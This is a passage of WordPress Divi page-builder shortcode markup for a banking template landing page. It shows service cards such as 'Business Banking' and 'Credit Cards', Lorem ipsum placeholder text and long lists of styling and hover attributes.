header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" custom_button=\"on\" button_text_size=\"13px\" button_text_color=\"#2edcb1\" button_bg_color=\"rgba(255,255,255,0)\" button_border_width=\"0px\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"5px\" button_letter_spacing=\"1px\" button_font=\"Roboto|||on|||||\" button_icon=\"%%180%%\" button_on_hover=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"40px\" box_shadow_blur=\"40px\" box_shadow_color=\"rgba(0,0,0,0)\" text_orientation=\"left\" background_layout=\"light\" custom_padding=\"|30px|30px|30px|false|true\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" link_option_url=\"#\" button_letter_spacing_hover=\"1px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"1px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_blur__hover_enabled=\"on\" box_shadow_vertical__hover=\"30px\" box_shadow_blur__hover=\"45px\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/bank-icon-3-2.png\" url=\"#\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" background_color=\"rgba(46,220,177,0.2)\" border_color_all=\"rgba(46,220,177,0.1)\" max_width=\"80px\" custom_margin=\"|||30px\" custom_padding=\"|||\" locked=\"off\" background__hover_enabled=\"on\" background_color__hover=\"#000000\"][/et_pb_image][et_pb_cta title=\"Business Banking\" button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.17.6\" header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" custom_button=\"on\" button_text_size=\"13px\" button_text_color=\"#2edcb1\" button_bg_color=\"rgba(255,255,255,0)\" button_border_width=\"0px\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"5px\" button_letter_spacing=\"1px\" button_font=\"Roboto|||on|||||\" button_icon=\"%%180%%\" button_on_hover=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"40px\" box_shadow_blur=\"40px\" box_shadow_color=\"rgba(0,0,0,0)\" text_orientation=\"left\" background_layout=\"light\" custom_padding=\"|30px|30px|30px|false|true\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" link_option_url=\"#\" button_letter_spacing_hover=\"1px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"1px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_blur__hover_enabled=\"on\" box_shadow_vertical__hover=\"30px\" box_shadow_blur__hover=\"45px\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row use_custom_width=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" _builder_version=\"3.17.2\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_4__hover=\"off\" parallax_4__hover_enabled=\"off\" parallax_5__hover=\"off\" parallax_5__hover_enabled=\"off\" parallax_6__hover=\"off\" parallax_6__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" parallax_method_4__hover=\"on\" parallax_method_4__hover_enabled=\"on\" parallax_method_5__hover=\"on\" parallax_method_5__hover_enabled=\"on\" parallax_method_6__hover=\"on\" parallax_method_6__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/bank-icon-4-2.png\" url=\"#\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" background_color=\"rgba(46,220,177,0.2)\" border_color_all=\"rgba(46,220,177,0.1)\" max_width=\"80px\" custom_margin=\"|||30px\" custom_padding=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"#000000\"][/et_pb_image][et_pb_cta title=\"Credit Cards\" button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.17.6\" header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" custom_button=\"on\" button_text_size=\"13px\" button_text_color=\"#2edcb1\" button_bg_color=\"rgba(255,255,255,0)\" button_border_width=\"0px\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"5px\" button_letter_spacing=\"1px\" button_font=\"Roboto|||on|||||\" button_icon=\"%%180%%\" button_on_hover=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"40px\" box_shadow_blur=\"40px\" box_shadow_color=\"rgba(0,0,0,0)\" text_orientation=\"left\" background_layout=\"light\" custom_padding=\"|30px|30px|30px|false|true\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" link_option_url=\"#\" button_letter_spacing_hover=\"1px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"1px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_blur__hover_enabled=\"on\" box_shadow_vertical__hover=\"30px\" box_shadow_blur__hover=\"45px\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/bank-icon-10-2.png\" url=\"#\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" background_color=\"rgba(46,220,177,0.2)\" border_color_all=\"rgba(46,220,177,0.1)\" max_width=\"80px\" custom_margin=\"|||30px\" custom_padding=\"|||\" locked=\"off\" background__hover_enabled=\"on\" background_color__hover=\"#000000\"][/et_pb_image][et_pb_cta title=\"Travel\" button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.17.6\" header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" custom_button=\"on\" button_text_size=\"13px\" button_text_color=\"#2edcb1\" button_bg_color=\"rgba(255,255,255,0)\" button_border_width=\"0px\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"5px\" button_letter_spacing=\"1px\" button_font=\"Roboto|||on|||||\" button_icon=\"%%180%%\" button_on_hover=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"40px\" box_shadow_blur=\"40px\" box_shadow_color=\"rgba(0,0,0,0)\" text_orientation=\"left\" background_layout=\"light\" custom_padding=\"|30px|30px|30px|false|true\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" link_option_url=\"#\" button_letter_spacing_hover=\"1px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"1px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_blur__hover_enabled=\"on\" box_shadow_vertical__hover=\"30px\" box_shadow_blur__hover=\"45px\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/bank-icon-1-2.png\" url=\"#\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" background_color=\"rgba(46,220,177,0.2)\" border_color_all=\"rgba(46,220,177,0.1)\" max_width=\"80px\" custom_margin=\"|||30px\" custom_padding=\"|||\" locked=\"off\" background__hover_enabled=\"on\" background_color__hover=\"#000000\"][/et_pb_image][et_pb_cta title=\"Money Management\" button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.17.6\" header_level=\"h6\" header_font=\"Roboto|700|||||||\" header_font_size=\"16px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" custom_button=\"on\" button_text_size=\"13px\" button_text_color=\"#2edcb1\" button_bg_color=\"rgba(255,255,255,0)\" button_border_width=\"0px\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"5px\" button_letter_spacing=\"1px\" button_font=\"Roboto|||on|||||\" button_icon=\"%%180%%\" button_on_hover=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"40px\" box_shadow_blur=\"40px\" box_shadow_color=\"rgba(0,0,0,0)\" text_orientation=\"left\" background_layout=\"light\" custom_padding=\"|30px|30px|30px|false|true\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" link_option_url=\"#\" button_letter_spacing_hover=\"1px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"1px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_color__hover_enabled=\"on\" box_shadow_blur__hover_enabled=\"on\" box_shadow_vertical__hover=\"30px\" box_shadow_blur__hover=\"45px\" box_shadow_color__hover=\"rgba(131,146,167,0.2)\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.2\" module_alignment=\"center\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_button button_text=\"View All Services\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#272d37\" button_border_width=\"15px\" button_border_color=\"#272d37\" button_border_radius=\"0px\" button_font=\"Roboto|700|||||||\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"3.17.6\" background_color_gradient_direction=\"90deg\"][et_pb_row use_custom_width=\"on\" custom_width_px=\"1200px\" custom_margin=\"100px||\" background_color_2=\"#fafbfd\" padding_left_1=\"60px\" padding_1_last_edited=\"on|tablet\" _builder_version=\"3.17.6\" custom_margin_tablet=\"0px||\" custom_margin_last_edited=\"on|tablet\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_4__hover=\"off\" parallax_4__hover_enabled=\"off\" parallax_5__hover=\"off\" parallax_5__hover_enabled=\"off\" parallax_6__hover=\"off\" parallax_6__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" parallax_method_4__hover=\"on\" parallax_method_4__hover_enabled=\"on\" parallax_method_5__hover=\"on\" parallax_method_5__hover_enabled=\"on\" parallax_method_6__hover=\"on\" parallax_method_6__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_last_edited=\"on|tablet\" padding_left=\"60px\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Roboto|700|||||||\" header_3_font_size=\"35px\" header_3_font_size_phone=\"25px\" header_3_font_size_last_edited=\"on|desktop\" header_3_line_height=\"1.4em\"]<h3>The Future of Banking is Now. Manage Your Funds on the Go</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.</p>\r[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"3.17.2\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#272d37\" button_border_width=\"15px\" button_border_color=\"#272d37\" button_border_radius=\"0px\" button_font=\"Roboto|700|||||||\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" background_color=\"#fafbfd\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/Bank_14.png\" always_center_on_mobile=\"off\" _builder_version=\"3.17.6\" max_width_last_edited=\"off|desktop\" custom_margin=\"-200px||\" custom_margin_tablet=\"0px||\" custom_margin_last_edited=\"on|tablet\" animation_style=\"roll\" animation_direction=\"bottom\" animation_intensity_roll=\"2%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"3.17.2\" background_color_gradient_direction=\"90deg\"][et_pb_row use_custom_width=\"on\" custom_width_px=\"1200px\" use_background_color_gradient_1=\"on\" background_color_gradient_start_1=\"#fafbfd\" background_color_gradient_end_1=\"#ffffff\" background_color_gradient_direction_1=\"90deg\" background_color_gradient_start_position_1=\"80%\" background_color_gradient_end_position_1=\"80%\" padding_right_2=\"60px\" _builder_version=\"3.17.6\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_4__hover=\"off\" parallax_4__hover_enabled=\"off\" parallax_5__hover=\"off\" parallax_5__hover_enabled=\"off\" parallax_6__hover=\"off\" parallax_6__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" parallax_method_4__hover=\"on\" parallax_method_4__hover_enabled=\"on\" parallax_method_5__hover=\"on\" parallax_method_5__hover_enabled=\"on\" parallax_method_6__hover=\"on\" parallax_method_6__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" 